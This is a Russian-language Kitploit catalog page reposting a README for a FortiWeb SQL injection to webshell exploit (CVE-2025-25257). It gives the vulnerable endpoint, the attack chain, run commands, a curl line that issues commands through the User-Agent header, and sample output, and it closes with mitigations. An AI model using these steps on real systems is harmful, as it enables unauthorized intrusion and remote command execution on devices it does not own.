Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-25257 — PoC для CVE-2025-25257, критическая SQL-инъекция без аутентификации в FortiWeb. Эксплуатирует SQLi через заголовок Authorization для записи веб-шелла и получения RCE. Вход не требуется. Полностью автоматизировано. | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2025-25257
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHub0xgh057r3c0n/cve-2025-25257

CVE-2025-25257

PoC для CVE-2025-25257, критическая SQL-инъекция без аутентификации в FortiWeb. Эксплуатирует SQLi через заголовок Authorization для записи веб-шелла и получения RCE. Вход не требуется. Полностью автоматизировано.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2025-25257 – FortiWeb SQLi к RCE

Критическая SQL-инъекция → Исполнение веб-шелла

Обнаружена и реализована 0xgh057r3c0n


🧠 Обзор уязвимости

CVE-2025-25257 затрагивает системы FortiWeb, которые предоставляют эндпоинт /api/fabric/device/status, который не выполняет должную санитизацию ввода заголовка Authorization.

Злоумышленник может выполнить неавторизованную SQL-инъекцию, чтобы записать веб-шелл на сервер и удалённо выполнять команды.


💥 Цепочка атаки

root@kitploit:~
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE

📍 Уязвимый эндпоинт

root@kitploit:~
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 Возможности эксплойта

  • SQLi через Bearer-токен
  • SQL INTO OUTFILE для сброса шелла
  • Python-хук запускает chmod
  • Команды выполняются через User-Agent
  • Полностью автоматизированный PoC

🧪 Использование

root@kitploit:~
python3 CVE-2025-25257.py -t https://target-host.com

Затем:

root@kitploit:~
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi

🔧 Требования

  • Python 3.6+
  • Модуль requests

Установка:

root@kitploit:~
pip install requests

📤 Пример вывода

root@kitploit:~
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header

📊 Оценка CVSS

МетрикаЗначение
Базовая оценка9.8 (КРИТИЧЕСКИ)
Вектор атакиСеть
Необходимые привилегииНет
Взаимодействие пользователя

🛡️ Смягчение

  • Обновите прошивку FortiWeb (если доступен патч)
  • Санитизируйте все входные данные заголовков
  • Ограничьте пути записи файлов и выполнение CGI

👨‍💻 Автор

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ Отказ от ответственности

Этот proof-of-concept предназначен только для образовательных и авторизованных тестов. Используйте на свой страх и риск. Автор не несёт ответственности за неправомерное использование.


Скачать инструмент
Нет
ВлияниеВысокое (C/I/A)